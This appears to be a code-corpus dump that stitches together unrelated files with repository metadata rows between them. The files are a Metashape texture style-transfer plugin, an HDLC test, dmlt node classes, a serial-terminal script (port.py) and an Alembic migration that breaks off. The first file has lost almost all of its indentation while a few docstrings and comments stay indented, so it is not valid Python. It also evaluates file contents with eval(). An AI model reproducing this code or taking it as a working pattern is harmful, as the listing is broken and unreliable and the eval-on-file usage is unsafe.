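#       Pillow==5.2.0 matplotlib==2.2.2 ipython==6.5.0 PyOpenGL==3.1.0 jupyter==1.0.0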
import Metashape
import pathlib, shutil, math
from PySide2 import QtGui, QtCore, QtWidgets
# Checking compatibility
compatible_major_version = "1.5"
found_major_version = ".".join(Metashape.app.version.split('.')[:2])
if found_major_version != compatible_major_version:
raise Exception("Incompatible Metashape version: {} != {}".format(found_major_version, compatible_major_version))
class ModelStyleTransferDlg(QtWidgets.QDialog):
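    """Qt dialog that collects style transfer parameters, exports the active chunk's
    model and runs the texture style transfer (modelStyleTransfer -> textureStyle3D)."""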
def __init__(self, parent):
self.texture_size = 2048
self.rendering_width = 2048
self.steps_number = 1000
self.style_path = ""
self.style_name = "style1"
self.working_dir = ""
self.model_name = "model1"
self.use_cameras_position = len(chunk.cameras) > 0
self.content_weight = 200.0
self.style_decay = 0.95
self.googlenet_style_layers = [
'conv2d2',
'mixed3a',
'mixed3b',
'mixed4a',
'mixed4b',
'mixed4c',
]
self.googlenet_content_layer = 'mixed3b'
if len(Metashape.app.document.path) > 0:
self.working_dir = str(pathlib.Path(Metashape.app.document.path).parent / "model_style_transfer")
self.model_name = pathlib.Path(Metashape.app.document.path).stem
# Paths will be inited in self.exportInput()
self.input_model_path = None
self.input_texture_path = None
self.input_cameras_path = None # Can be None if no cameras or self.use_cameras_position is False
self.output_dir = None
self.output_texture_path = None
self.result_model_path = None
# Cameras will be loaded with self.exportCameras() + self.loadCameras() or randomly sampled with meshutil.sample_view(10.0, 12.0)
self.cameras = None
self.max_fovy = 10.0
self.aspect_ratio = 1.0
QtWidgets.QDialog.__init__(self, parent)
self.setWindowTitle("Model style transfer")
self.createGUI()
self.initDefaultParams()
self.exec()
def modelStyleTransfer(self):
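        """Read the dialog parameters, export the input data and run textureStyle3D()."""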
self.loadParams()
print("Script started...")
self.exportInput()
try:
self.textureStyle3D()
except:
Metashape.app.messageBox("Something gone wrong!\n"
"Please check the console.")
raise
finally:
self.reject()
print("Script finished!")
return True
def chooseStylePath(self):
style_path = Metashape.app.getOpenFileName(filter="*.jpg;;*.jpeg;;*.JPG;;*.JPEG;;*.png;;*.PNG")
self.edtStylePath.setText(style_path)
self.edtStyleName.setText(pathlib.Path(style_path).stem)
def chooseWorkingDir(self):
working_dir = Metashape.app.getExistingDirectory()
self.edtWorkingDir.setText(working_dir)
def createGUI(self):
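        """Build the dialog widgets and connect the buttons to their handlers."""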
layout = QtWidgets.QGridLayout()
row = 0
        self.txtStylePath = QtWidgets.QLabel()
        self.txtStylePath.setText("Style image:")
        self.txtStylePath.setFixedSize(150, 25)
        self.edtStylePath = QtWidgets.QLineEdit()
self.edtStylePath.setPlaceholderText("URL or file path")
self.btnStylePath = QtWidgets.QPushButton("...")
self.btnStylePath.setFixedSize(25, 25)
QtCore.QObject.connect(self.btnStylePath, QtCore.SIGNAL("clicked()"), lambda: self.chooseStylePath())
layout.addWidget(self.txtStylePath, row, 0)
layout.addWidget(self.edtStylePath, row, 1)
layout.addWidget(self.btnStylePath, row, 2)
row += 1
self.txtStyleName = QtWidgets.QLabel()
self.txtStyleName.setText("Style name:")
self.txtStyleName.setFixedSize(150, 25)
self.edtStyleName = QtWidgets.QLineEdit()
layout.addWidget(self.txtStyleName, row, 0)
layout.addWidget(self.edtStyleName, row, 1, 1, 2)
row += 1
self.txtStepsNumber = QtWidgets.QLabel()
self.txtStepsNumber.setText("Steps number:")
self.txtStepsNumber.setFixedSize(150, 25)
self.edtStepsNumber = QtWidgets.QLineEdit()
self.edtStepsNumber.setPlaceholderText("number of iterations")
layout.addWidget(self.txtStepsNumber, row, 0)
layout.addWidget(self.edtStepsNumber, row, 1, 1, 2)
row += 1
self.txtTextureSize = QtWidgets.QLabel()
self.txtTextureSize.setText("Texture size:")
self.txtTextureSize.setFixedSize(150, 25)
self.edtTextureSize = QtWidgets.QLineEdit()
self.edtTextureSize.setPlaceholderText("resulting texture resolution")
layout.addWidget(self.txtTextureSize, row, 0)
layout.addWidget(self.edtTextureSize, row, 1, 1, 2)
row += 1
self.txtRenderingSize = QtWidgets.QLabel()
self.txtRenderingSize.setText("Rendering size:")
self.txtRenderingSize.setFixedSize(150, 25)
self.edtRenderingSize = QtWidgets.QLineEdit()
self.edtRenderingSize.setPlaceholderText("width of rendering buffer")
layout.addWidget(self.txtRenderingSize, row, 0)
layout.addWidget(self.edtRenderingSize, row, 1, 1, 2)
row += 1
self.txtModelName = QtWidgets.QLabel()
self.txtModelName.setText("Model name:")
self.txtModelName.setFixedSize(150, 25)
self.edtModelName = QtWidgets.QLineEdit()
layout.addWidget(self.txtModelName, row, 0)
layout.addWidget(self.edtModelName, row, 1, 1, 2)
row += 1
        self.txtWorkingDir = QtWidgets.QLabel()
        self.txtWorkingDir.setText("Working dir:")
        self.txtWorkingDir.setFixedSize(150, 25)
        self.edtWorkingDir = QtWidgets.QLineEdit()
self.edtWorkingDir.setPlaceholderText("path to dir")
self.btnWorkingDir = QtWidgets.QPushButton("...")
self.btnWorkingDir.setFixedSize(25, 25)
QtCore.QObject.connect(self.btnWorkingDir, QtCore.SIGNAL("clicked()"), lambda: self.chooseWorkingDir())
layout.addWidget(self.txtWorkingDir, row, 0)
layout.addWidget(self.edtWorkingDir, row, 1)
layout.addWidget(self.btnWorkingDir, row, 2)
row += 1
        self.txtContentWeight = QtWidgets.QLabel()
        self.txtContentWeight.setText("Content weight:")
        self.txtContentWeight.setFixedSize(150, 25)
        self.edtContentWeight = QtWidgets.QLineEdit()
layout.addWidget(self.txtContentWeight, row, 0)
layout.addWidget(self.edtContentWeight, row, 1, 1, 2)
row += 1
self.txtUseCameraPositions= QtWidgets.QLabel()
self.txtUseCameraPositions.setText("Use cameras position:")
self.txtUseCameraPositions.setFixedSize(150, 25)
self.chbUseCameraPositions= QtWidgets.QCheckBox()
if len(chunk.cameras) == 0:
self.chbUseCameraPositions.setEnabled(False)
layout.addWidget(self.txtUseCameraPositions, row, 0)
layout.addWidget(self.chbUseCameraPositions, row, 1)
row += 1
self.txtPBar = QtWidgets.QLabel()
self.txtPBar.setText("Progress:")
self.txtPBar.setFixedSize(150, 25)
self.pBar = QtWidgets.QProgressBar()
self.pBar.setTextVisible(False)
self.pBar.setMinimumSize(239, 25)
layout.addWidget(self.txtPBar, row, 0)
layout.addWidget(self.pBar, row, 1, 1, 2)
row += 1
self.btnRun = QtWidgets.QPushButton("Run")
layout.addWidget(self.btnRun, row, 1, 1, 2)
row += 1
self.setLayout(layout)
QtCore.QObject.connect(self.btnRun, QtCore.SIGNAL("clicked()"), lambda: self.modelStyleTransfer())
def initDefaultParams(self):
self.edtTextureSize.setText(str(self.texture_size))
self.edtRenderingSize.setText(str(self.rendering_width))
self.edtStepsNumber.setText(str(self.steps_number))
self.edtStylePath.setText(str(self.style_path))
self.edtStyleName.setText(self.style_name)
self.edtWorkingDir.setText(self.working_dir)
self.edtModelName.setText(self.model_name)
self.edtContentWeight.setText(str(self.content_weight))
self.chbUseCameraPositions.setChecked(self.use_cameras_position)
def loadParams(self):
self.texture_size = int(self.edtTextureSize.text())
self.rendering_width = int(self.edtRenderingSize.text())
self.steps_number = int(self.edtStepsNumber.text())
self.style_path = self.edtStylePath.text()
self.style_name = self.edtStyleName.text()
self.working_dir = self.edtWorkingDir.text()
self.model_name = self.edtModelName.text()
self.content_weight = float(self.edtContentWeight.text())
self.use_cameras_position = self.chbUseCameraPositions.isChecked()
if len(self.style_path) == 0:
Metashape.app.messageBox("You should specify style image!")
raise Exception("You should specify style image!")
if len(self.working_dir) == 0:
Metashape.app.messageBox("You should specify working dir!")
raise Exception("You should specify working dir!")
def exportInput(self):
working_dir = pathlib.Path(self.working_dir)
print("Creating working directory '{}'...".format(self.working_dir))
working_dir.mkdir(parents=True, exist_ok=True)
self.input_model_path = str(working_dir / "{}.ply".format(self.model_name))
print("Exporting model to '{}'...".format(self.input_model_path))
chunk.exportModel(self.input_model_path, binary=True, texture_format=Metashape.ImageFormatJPEG, texture=True,
normals=False, colors=False, cameras=False, markers=False, format=Metashape.ModelFormatPLY)
self.input_model_path = str(working_dir / "{}.obj".format(self.model_name))
print("Exporting model to '{}'...".format(self.input_model_path))
chunk.exportModel(self.input_model_path, binary=False, texture_format=Metashape.ImageFormatJPEG, texture=True,
normals=False, colors=False, cameras=False, markers=False, format=Metashape.ModelFormatOBJ)
self.input_texture_path = str(working_dir / "{}.jpg".format(self.model_name))
self.input_cameras_path = str(working_dir / "{}.cameras".format(self.model_name))
if not self.use_cameras_position or not self.exportCameras():
self.input_cameras_path = None
self.output_dir = working_dir / self.style_name
print("Creating output directory '{}'...".format(str(self.output_dir)))
if self.output_dir.exists():
print(" output directory already exists! Deleting...")
shutil.rmtree(str(self.output_dir))
self.output_dir.mkdir(parents=False, exist_ok=False)
for ext in ["obj", "ply", "mtl"]:
input_path = working_dir / "{}.{}".format(self.model_name, ext)
output_path = self.output_dir / "{}.{}".format(self.model_name, ext)
print(" copying {}.{} to output...".format(self.model_name, ext))
shutil.copyfile(str(input_path), str(output_path))
self.output_texture_path = str(self.output_dir / "{}.jpg".format(self.model_name))
self.result_model_path = str(self.output_dir / "{}.obj".format(self.model_name))
def exportCameras(self):
matrices = []
selection_active = len([c for c in chunk.cameras if c.selected]) > 0
for c in chunk.cameras:
if (selection_active and not c.selected) or not c.enabled or c.transform is None or c.type != Metashape.Camera.Type.Regular:
continue
calibration = c.sensor.calibration
f, w, h = calibration.f, calibration.width, calibration.height
transformToWorld = chunk.transform.matrix * c.transform
matrices.append({
"transformToWorld": eval(str(transformToWorld)[len("Matrix("):-1]),
"fovH": 2 * math.atan(w / 2 / f) * 180 / math.pi,
"fovV": 2 * math.atan(h / 2 / f) * 180 / math.pi,
"w": w,
"h": h,
})
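            # Worked example for the field-of-view formula above (illustrative
            # numbers, not taken from any real calibration): with a focal length
            # f = 3000 px and an image width w = 4000 px,
            #   fovH = 2 * atan(4000 / 2 / 3000) * 180 / pi, which is about 67.4 degrees.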
if len(matrices) == 0:
return False
with open(self.input_cameras_path, "w") as f:
f.writelines(str(matrices))
return True
def loadCameras(self):
import numpy as np
if self.input_cameras_path is None:
return None
with open(self.input_cameras_path) as f:
self.cameras = f.readline()
self.cameras = eval(self.cameras)
if len(self.cameras) == 0:
print("Cameras will be randomly sampled!")
self.cameras = None
self.max_fovy = 10.0
self.aspect_ratio = 1.0
else:
print("Loaded {} cameras!".format(len(self.cameras)))
self.max_fovy = 0.0
self.aspect_ratio = 0.0
for i in range(len(self.cameras)):
m = np.float32(self.cameras[i]["transformToWorld"])
m = np.linalg.inv(m)
m[1, :] = -m[1, :]
m[2, :] = -m[2, :]
self.cameras[i]["transformToCamera"] = m
self.cameras[i]["transformToWorld"] = np.linalg.inv(m)
self.max_fovy = max(self.cameras[i]["fovV"], self.max_fovy)
self.aspect_ratio = self.cameras[i]["w"] / self.cameras[i]["h"]
print("Vertical field of view: {:.2f} degrees. Aspect ratio width/height: {:.2f}.".format(self.max_fovy,
self.aspect_ratio))
def textureStyle3D(self):
print("Importing tensorflow...")
import tensorflow as tf
print("Checking that GPU is visible for tensorflow...")
if not tf.test.is_gpu_available():
raise Exception("No GPU available for tensorflow!")
print("Importing other libraries...")
import os
import io
import sys
from string import Template
from pathlib import Path
import numpy as np
import PIL.Image
# import matplotlib.pylab as pl
from IPython.display import clear_output, display, Image, HTML
# if os.name != 'nt':
# from lucid.misc.gl.glcontext import create_opengl_context
import OpenGL.GL as gl
from lucid.misc.gl import meshutil
from lucid.misc.gl import glrenderer
import lucid.misc.io.showing as show
import lucid.misc.io as lucid_io
from lucid.misc.tfutil import create_session
from lucid.modelzoo import vision_models
from lucid.optvis import objectives
from lucid.optvis import param
from lucid.optvis.style import StyleLoss, mean_l1_loss
from lucid.optvis.param.spatial import sample_bilinear
# if os.name != 'nt':
# print("Creating OpenGL context...")
# create_opengl_context()
gl.glGetString(gl.GL_VERSION)
print("Loading vision model...")
model = vision_models.InceptionV1()
model.load_graphdef()
def prepare_image(fn, size=None):
data = lucid_io.reading.read(fn)
im = PIL.Image.open(io.BytesIO(data)).convert('RGB')
if size:
im = im.resize(size, PIL.Image.ANTIALIAS)
return np.float32(im) / 255.0
self.loadCameras()
print("Loading input model from '{}'...".format(self.input_model_path))
mesh = meshutil.load_obj(self.input_model_path)
if self.cameras is None:
mesh = meshutil.normalize_mesh(mesh)
print("Loading input texture from '{}'...".format(self.input_texture_path))
original_texture = prepare_image(self.input_texture_path, (self.texture_size, self.texture_size))
print("Loading style from '{}'...".format(self.style_path))
style = prepare_image(self.style_path)
rendering_width = self.rendering_width
rendering_height = int(rendering_width // self.aspect_ratio)
print("Creating renderer with resolution {}x{}...".format(rendering_width, rendering_height))
renderer = glrenderer.MeshRenderer((rendering_width, rendering_height))
if self.cameras is not None:
print(" renderer fovy: {:.2f} degrees".format(self.max_fovy))
renderer.fovy = self.max_fovy
sess = create_session(timeout_sec=0)
# t_fragments is used to feed rasterized UV coordinates for the current view.
# Channels: [U, V, _, Alpha]. Alpha is 1 for pixels covered by the object, and
# 0 for background.
t_fragments = tf.placeholder(tf.float32, [None, None, 4])
t_uv = t_fragments[..., :2]
t_alpha = t_fragments[..., 3:]
# Texture atlas to optimize
t_texture = param.image(self.texture_size, fft=True, decorrelate=True)[0]
# Variable to store the original mesh texture used to render content views
content_var = tf.Variable(tf.zeros([self.texture_size, self.texture_size, 3]), trainable=False)
# Sample current and original textures with provided pixel data
t_joined_texture = tf.concat([t_texture, content_var], -1)
t_joined_frame = sample_bilinear(t_joined_texture, t_uv) * t_alpha
t_frame_current, t_frame_content = t_joined_frame[..., :3], t_joined_frame[..., 3:]
t_joined_frame = tf.stack([t_frame_current, t_frame_content], 0)
# Feeding the rendered frames to the Neural Network
t_input = tf.placeholder_with_default(t_joined_frame, [None, None, None, 3])
model.import_graph(t_input)
# style loss
style_layers = [sess.graph.get_tensor_by_name('import/%s:0' % s)[0] for s in self.googlenet_style_layers]
# L1-loss seems to be more stable for GoogleNet
# Note that we use style_decay>0 to average style-describing Gram matrices
# over the recent viewports. Please refer to StyleLoss for the details.
sl = StyleLoss(style_layers, self.style_decay, loss_func=mean_l1_loss)
# content loss
content_layer = sess.graph.get_tensor_by_name('import/%s:0' % self.googlenet_content_layer)
content_loss = mean_l1_loss(content_layer[0], content_layer[1]) * self.content_weight
# setup optimization
total_loss = content_loss + sl.style_loss
t_lr = tf.constant(0.05)
trainer = tf.train.AdamOptimizer(t_lr)
train_op = trainer.minimize(total_loss)
init_op = tf.global_variables_initializer()
loss_log = []
def reset(style_img, content_texture):
del loss_log[:]
init_op.run()
sl.set_style({t_input: style_img[None, ...]})
content_var.load(content_texture)
def sample_random_view():
if self.cameras is None:
return meshutil.sample_view(10.0, 12.0)
else:
rand_m = self.cameras[np.random.randint(0, len(self.cameras))]["transformToCamera"].copy()
return rand_m
def run(mesh, step_n=400):
app = QtWidgets.QApplication.instance()
for i in range(step_n):
fragments = renderer.render_mesh(
modelview=sample_random_view(),
position=mesh['position'], uv=mesh['uv'],
face=mesh['face'])
_, loss = sess.run([train_op, [content_loss, sl.style_loss]], {t_fragments: fragments})
loss_log.append(loss)
if i == 0 or (i + 1) % 50 == 0:
# clear_output()
last_frame, last_content = sess.run([t_frame_current, t_frame_content], {t_fragments: fragments})
# show.images([last_frame, last_content], ['current frame', 'content'])
if i == 0 or (i + 1) % 10 == 0:
print(len(loss_log), loss)
pass
# Show progress
self.pBar.setValue((i + step_n//10 + 1) / (step_n + step_n//10) * 100)
app.processEvents()
reset(style, original_texture)
print("Running {} iterations...".format(self.steps_number))
run(mesh, step_n=self.steps_number)
print("Finished!")
texture = t_texture.eval()
print("Exporting result texture to '{}'...".format(self.output_texture_path))
lucid_io.save(texture, self.output_texture_path, quality=90)
sess.close()
print("Importing result model to Metashape '{}'...".format(self.result_model_path))
chunk.model = None
chunk.importModel(self.result_model_path)
chunk.model.label = self.style_name
Metashape.app.messageBox("Everything worked fine!\n"
"Please save project and RESTART Metashape!\n"
"Because video memory was not released by TensorFlow!")
def model_style_transfer():
global chunk
chunk = Metashape.app.document.chunk
if chunk is None or chunk.model is None:
raise Exception("No active model!")
if chunk.model.texture is None or chunk.model.tex_vertices is None or len(chunk.model.tex_vertices) == 0:
raise Exception("Model is not textured!")
app = QtWidgets.QApplication.instance()
parent = app.activeWindow()
dlg = ModelStyleTransferDlg(parent)
label = "Custom menu/Model style transfer"
Metashape.app.addMenuItem(label, model_style_transfer)
print("To execute this script press {}".format(label))
| mit | 3,523,976,573,227,111,400 | 41.113208 | 188 | 0.620116 | false | 3.71381 | false | false | false |
realms-team/solmanager | libs/sol-REL-1.7.5.0/tests/test_hdlc.py | 3 | 3377 | import os
from sensorobjectlibrary import openhdlc as hdlc
from sensorobjectlibrary import Sol as sol
JSON = {
'timestamp': 1521645792,
'mac': '00-17-0d-00-00-58-5b-02',
'type': 33,
'value': {
'manager': '00-17-0d-00-00-58-5b-02',
'valid': True,
'snapshot': {
'getNetworkInfo': {
'numLostPackets': 0,
'advertisementState': 0,
'ipv6Address': 'fe80:0000:0000:0000:0017:0d00:0058:5b02',
'asnSize': 7250,
'numMotes': 0,
'numArrivedPackets': 0,
'netLatency': 0,
'netState': 0,
'netPathStability': 0,
'downFrameState': 1,
'maxNumbHops': 0,
'RC': 0,
'netReliability': 0
},
'timestamp_stop': 'Wed, 21 Mar 2018 15:23:12 UTC',
'getMoteConfig': {
'00-17-0d-00-00-58-5b-02': {
'macAddress': '00-17-0d-00-00-58-5b-02',
'reserved': 1,
'state': 4,
'isRouting': True,
'RC': 0,
'moteId': 1,
'isAP': True}
},
'epoch_stop': 1521645792.786726,
'getSystemInfo': {
'macAddress': '00-17-0d-00-00-58-5b-02',
'swBuild': 9,
'swPatch': 1, 'hwModel': 16, 'swMajor': 1, 'swMinor': 4,
'RC': 0, 'hwRev': 1
},
'getMoteLinks': {
'00-17-0d-00-00-58-5b-02': {
'links': []
}
},
'getMoteInfo': {
'00-17-0d-00-00-58-5b-02': {
'macAddress': '00-17-0d-00-00-58-5b-02',
'assignedBw': 0,
'stateTime': 1355,
'numGoodNbrs': 0, 'numJoins': 1, 'state': 4,
'packetsReceived': 6, 'hopDepth': 0,
'totalNeededBw': 55890, 'requestedBw': 55890, 'avgLatency': 0,
'RC': 0, 'numNbrs': 0, 'packetsLost': 0
}
},
'getPathInfo': {
'00-17-0d-00-00-58-5b-02': {
}
},
'timestamp_start': 'Wed, 21 Mar 2018 15:23:12 UTC',
'getNetworkConfig': {
'networkId': 1229, 'apTxPower': 8, 'ccaMode': 0, 'locMode': 0,
'numParents': 2, 'channelList': 32767, 'baseBandwidth': 9000,
'maxMotes': 101, 'bbSize': 1, 'bbMode': 0, 'oneChannel': 255,
'isRadioTest': 0, 'downFrameMultVal': 1, 'RC': 0,
'bwMult': 300, 'frameProfile': 1, 'autoStartNetwork': True
}
},
'name': 'snapshot'}}
JSON2 = {
'timestamp': 1521645792,
'mac': '00-17-0d-00-00-58-5b-02',
'type': 40,
'value': {
'SolManager': [2, 0, 1, 0],
'Sol': [1, 4, 0, 0],
'SmartMesh SDK': [1, 1, 2, 4]}
}
def test_hdlc():
file_name = "test_hdlc.backup"
h = hdlc.hdlcify(sol.json_to_bin(JSON))
s = "".join(chr(c) for c in h)
with open(file_name, 'ab') as f:
f.write(s)
(d,o) = hdlc.dehdlcify(file_name)
assert d[0] == sol.json_to_bin(JSON)
assert sol.bin_to_json(d[0]) == JSON
os.remove(file_name)
| bsd-3-clause | -905,223,369,981,711,500 | 33.459184 | 82 | 0.426118 | false | 3.191871 | false | false | false |
EnTeQuAk/dmlt | dmlt/node.py | 1 | 3237 | #-*- coding: utf-8 -*-
"""
    dmlt.node
    ~~~~~~~~~
Node interface for DMLT.
:copyright: 2008 by Christopher Grebs.
:license: BSD, see LICENSE for more details.
"""
from dmlt import events
from dmlt.utils import node_repr, escape, striptags
from dmlt.query import NodeQueryMixin
class BaseNode(object):
"""
A node that represents a part of a document.
It still implements the `Query` interface to query for nodes.
Should be subclassed to implement more `format` options.
"""
__slots__ = ()
#: The node can contain children.
#: Each container node needs to implement
#: a `children` attribute to access child-nodes.
is_container = False
#: True if this is a text node
is_text_node = False
#: This node is some kind of line breaking node
#: as \n or \r\n are some.
is_linebreak_node = False
#: True if this node is a raw one.
#: Raw nodes are never processed by node-filters.
#: Use this only if the node-content matters e.g.
#: in sourcecode.
is_raw = False
is_document = False
#: the value of the node as text
text = u''
def __eq__(self, other):
return self.__class__ is other.__class__ and \
self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
__repr__ = node_repr
class Node(BaseNode, NodeQueryMixin):
def prepare(self, format='html'):
return {'html': self.prepare_html}[format]()
def prepare_html(self):
return iter(())
class DeferredNode(Node):
"""
Special node with a `replace_by()` function that can be used to replace
this node in place with another one.
"""
def __init__(self, node):
self.node = node
def replace_by(self, other):
self.__class__ = other.__class__
self.__dict__ = other.__dict__
is_container = property(lambda s: s.node.is_container)
is_text_node = property(lambda s: s.node.is_text_node)
is_raw = property(lambda s: s.node.is_raw)
class Text(Node):
"""
Represents text.
"""
is_text_node = True
def __init__(self, text=u''):
self.text = text
def prepare_html(self):
yield escape(self.text)
class HTML(Node):
"""
Raw HTML snippet.
"""
def __init__(self, html=u''):
self.html = html
@property
def text(self):
return striptags(self.html)
def prepare_html(self):
yield self.html
class Container(Node):
"""
A basic node with children.
"""
is_container = True
def __init__(self, children=None):
if children is None:
children = []
self.children = children
@property
def text(self):
return u''.join(x.text for x in self.children)
def prepare_html(self):
for child in self.children:
for item in child.prepare_html():
yield item
class Document(Container):
"""
Outermost node.
"""
is_document = True
@events.register('define-document-node')
def _handle_define_document_node(manager, *args, **kwargs):
return Document
class Raw(Container):
"""
A raw container.
"""
is_raw = True
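# A minimal usage sketch (illustrative only, not part of the original module):
# build a small tree and render it, relying only on the classes defined above.
#
#   doc = Document([Text(u'Hello '), HTML(u'<b>world</b>')])
#   u''.join(doc.prepare_html())   # -> u'Hello <b>world</b>'
#   doc.text                       # -> u'Hello world'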
| bsd-3-clause | -6,170,797,914,194,077,000 | 20.58 | 75 | 0.591597 | false | 3.77713 | false | false | false |
apenwarr/port | port.py | 1 | 8476 | #!/usr/bin/env python
# Copyright 2011-2012 Avery Pennarun and port.py contributors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import array
import errno
import fcntl
import os
import random
import select
import sys
import termios
import time
import tty
import options
optspec = """
port [options...] <tty>
--
s,speed= the baud rate to use [115200]
l,limit= maximum upload rate (for devices with crappy flow control) [9600]
"""
def log(s, *args):
if args:
ss = s % args
else:
ss = s
sys.stdout.flush()
sys.stderr.write(ss.replace('\n', '\r\n'))
sys.stderr.flush()
class ModemError(Exception):
pass
class AlreadyLockedError(Exception):
pass
def _speedv(speed):
try:
return termios.__dict__['B%s' % int(speed)]
except KeyError:
raise ModemError('invalid port speed: %r (try 115200, 57600, etc)'
% speed)
def _unlink(path):
try:
os.unlink(path)
except OSError, e:
if e.errno == errno.ENOENT:
return # it's deleted, so that's not an error
raise
class Lock(object):
"""Represents a unix tty lockfile to prevent overlapping access."""
def __init__(self, devname):
assert '/' not in devname
if os.path.exists('/var/lock'):
# Linux standard location
self.path = '/var/lock/LCK..%s' % devname
else:
            # this is the path minicom seems to use on MacOS X
self.path = '/tmp/LCK..%s' % devname
self.lock()
def __del__(self):
self.unlock()
def read(self):
try:
return int(open(self.path).read().strip().split()[0])
except IOError, e:
if e.errno == errno.ENOENT:
return None # not locked
else:
return 0 # invalid lock
except ValueError:
return 0
def _pid_exists(self, pid):
assert pid > 0
try:
os.kill(pid, 0) # 0 is a signal that always does nothing
except OSError, e:
if e.errno == errno.EPERM: # no permission means it exists!
return True
if e.errno == errno.ESRCH: # not found
return False
raise # any other error is weird, pass it on
return True # no error means it exists
def _try_lock(self):
try:
fd = os.open(self.path, os.O_WRONLY|os.O_CREAT|os.O_EXCL, 0666)
except OSError:
return
try:
os.write(fd, '%s\n' % os.getpid())
finally:
os.close(fd)
def lock(self):
mypid = os.getpid()
for _ in range(10):
pid = self.read()
if pid == mypid:
return
elif pid is None:
# file did not exist
self._try_lock()
elif pid > 0 and self._pid_exists(pid):
raise AlreadyLockedError('%r locked by pid %d'
% (self.path, pid))
else:
# the lock owner died or didn't write a pid. Cleaning it
# creates a race condition. Delete it only after
# double checking.
time.sleep(0.2 + 0.2*random.random())
pid2 = self.read()
if pid2 == pid and (pid == 0 or not self._pid_exists(pid)):
_unlink(self.path)
# now loop and try again. Someone else might be racing with
# us, so there's no guarantee we'll get the lock on our
# next try.
raise AlreadyLockedError('%r lock contention detected' % self.path)
def unlock(self):
if self.read() == os.getpid():
_unlink(self.path)
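# Illustrative use of Lock (a sketch, not part of the original file); the Modem
# class below creates a Lock for the device internally, so the device name here
# is only an example.
#
#   lock = Lock('ttyUSB0')        # raises AlreadyLockedError if another live
#   try:                          # process holds /var/lock/LCK..ttyUSB0
#       pass                      # ... open and use the serial port ...
#   finally:
#       lock.unlock()             # also happens automatically in __del__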
class Modem(object):
def __init__(self, filename, speed):
self.fd = self.tc_orig = None
if '/' not in filename and os.path.exists('/dev/%s' % filename):
filename = '/dev/%s' % filename
self.lock = Lock(os.path.basename(filename))
self.fd = os.open(filename, os.O_RDWR | os.O_NONBLOCK)
fcntl.fcntl(self.fd, fcntl.F_SETFL,
fcntl.fcntl(self.fd, fcntl.F_GETFL) & ~os.O_NONBLOCK)
self.tc_orig = tc = termios.tcgetattr(self.fd)
tc[4] = tc[5] = _speedv(speed)
tc[2] &= ~(termios.PARENB | termios.PARODD)
tc[2] |= termios.CLOCAL
termios.tcsetattr(self.fd, termios.TCSADRAIN, tc)
tty.setraw(self.fd)
def __del__(self):
self.close()
def close(self):
if self.fd is not None:
try:
termios.tcsetattr(self.fd, termios.TCSADRAIN, self.tc_orig)
except:
pass
os.close(self.fd)
def flags(self):
bits = [(i, getattr(termios,i))
for i in dir(termios)
if i.startswith('TIOCM_')]
tbuf = array.array('i', [0])
fcntl.ioctl(self.fd, termios.TIOCMGET, tbuf, True)
out = []
for name, bit in sorted(bits):
if tbuf[0] & bit:
out.append(name[6:])
return ', '.join(out)
def sendbreak(self):
termios.tcsendbreak(self.fd, 0)
def main():
o = options.Options(optspec)
(opt, flags, extra) = o.parse(sys.argv[1:])
if len(extra) != 1:
o.fatal("exactly one tty name expected")
filename = extra[0]
if opt.limit and opt.limit < 300:
o.fatal('--limit should be at least 300 bps')
if opt.limit > max(115200, int(opt.speed)):
o.fatal('--limit should be no more than --speed')
tc_stdin_orig = termios.tcgetattr(0)
modem = Modem(filename, opt.speed)
line = ''
MAGIC = ['~.', '!.']
try:
tty.setraw(0)
mflags = None
last_out = 0
if opt.limit:
secs_per_byte = 1.0 / (float(opt.limit) / 10)
assert(secs_per_byte < 0.1)
log('(Type ~. or !. to exit, or ~b to send BREAK)')
while 1:
newflags = modem.flags()
if newflags != mflags:
mflags = newflags
log('\n(Line Status: %s)\n', mflags)
r,w,x = select.select([0,modem.fd], [], [])
if 0 in r:
buf = os.read(0, 1)
if buf in '\r\n\x03':
line = ''
else:
line += buf
if line in MAGIC:
break
if line == '~b':
log('(BREAK)')
modem.sendbreak()
line = ''
elif len(buf):
os.write(modem.fd, buf)
if opt.limit:
time.sleep(secs_per_byte)
if modem.fd in r:
buf = os.read(modem.fd, 4096)
if len(buf):
os.write(1, buf)
if buf == '\0':
log('\n(received NUL byte)\n')
finally:
termios.tcsetattr(0, termios.TCSANOW, tc_stdin_orig)
if __name__ == '__main__':
try:
main()
except AlreadyLockedError, e:
sys.stderr.write('error: %s\n' % e)
exit(1)
| bsd-2-clause | -8,557,969,775,399,282,000 | 30.392593 | 77 | 0.541529 | false | 3.831826 | false | false | false |
selenamarie/nuthatch | migrations/versions/3394654f4780_.py | 1 | 1043 | """empty message
Revision ID: 3394654f4780
Revises: 23c49602b4ca
Create Date: 2015-01-30 14:49:18.237825
"""
# revision identifiers, used by Alembic.
revision = '3394654f4780'
down_revision = '23c49602b4ca'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('queries',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('slug', postgresql.UUID(), nullable=True),
sa.Column('query', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
